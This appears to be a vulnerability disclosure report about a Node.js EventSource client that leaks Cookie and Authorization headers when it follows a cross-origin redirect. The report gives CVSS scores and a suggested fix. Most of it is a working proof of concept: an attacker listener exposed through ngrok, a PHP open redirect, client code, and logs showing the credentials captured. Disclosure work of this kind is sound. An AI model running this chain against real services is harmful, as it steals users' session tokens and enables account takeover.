CVSS3: 9.3 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

CVSS2: 5.8 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

EPSS: 0.002 Low
Percentile: 54.9%
> Reported on Feb 6th 2022 | Timothee Desurmont
Vulnerability type: CWE-200

Cookie and Authorization headers are leaked to external sites.

When the client fetches a URL that redirects to an external site, the user's Cookie and Authorization headers are forwarded to the third-party application. Under the same-origin policy, those headers should be stripped ("sanitized") before a cross-origin redirect is followed.
```javascript
// server.js: attacker-side listener that logs every request header it receives
const express = require('express')
const app = express()
app.get('/', function (req, res) {
  console.log(req.headers);
  res.status(200).send()
})
app.listen(3000)
console.log('listening on port 3000');
```
```text
ngrok http 3000

Session Status                online
Account                       Timothee Desurmont (Plan: Free)
Update                        update available (version 2.3.40, Ctrl-U to update)
Version                       2.3.35
Region                        United States (us)
Web Interface                 http://127.0.0.1:4040
Forwarding                    http://cb45-92-98-215-185.ngrok.io -> http://localhost:3000
Forwarding                    https://cb45-92-98-215-185.ngrok.io -> http://localhost:3000

Connections                   ttl     opn     rt1     rt5     p50     p90
                              1       0       0.00    0.00    8.92    8.92

HTTP Requests
-------------

GET /                         200 OK
```
```php
<?php
// /var/www/html/redirect.php on mysite: an open redirect to whatever ?url= names
$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);
```
```javascript
// client.js: the SSE request to mysite carries a Cookie and an Authorization
// header; mysite's redirect.php sends the client on to the attacker host
const EventSource = require("eventsource")
const mysite = "http://192.168.2.31";
const attacker = "http://cb45-92-98-215-185.ngrok.io";
const options = {
  method: 'GET',
  headers: {
    'Content-Type': 'application/json',
    'Cookie': 'ajs_anonymous_id=1234567890"',
    'Authorization': 'Bearer eyJhb12345abcdef'
  }
};
var es = new EventSource(`${mysite}/redirect.php?url=${attacker}/`, options);
es.onerror = function (err) {
  if (err) {
    if (err.status === 401 || err.status === 403) {
      console.log('not authorized');
    }
  }
};
```
```text
[nodemon] starting `node server.js`
listening on port 3000
{
  host: 'cb45-92-98-215-185.ngrok.io',
  accept: 'text/event-stream',
  authorization: 'Bearer eyJhb12345abcdef',
  'cache-control': 'no-cache',
  'content-type': 'application/json',
  cookie: 'ajs_anonymous_id=1234567890"',
  'x-forwarded-for': '92.98.215.185',
  'x-forwarded-proto': 'http',
  'accept-encoding': 'gzip'
}
```
Access Control: hijack of the victim's account.

The attacker can capture the user's credentials and then use them to access the legitimate web site.

If the redirected URL is on a different domain from the original URL, the Authorization and Cookie headers should be removed from the request before it is re-sent.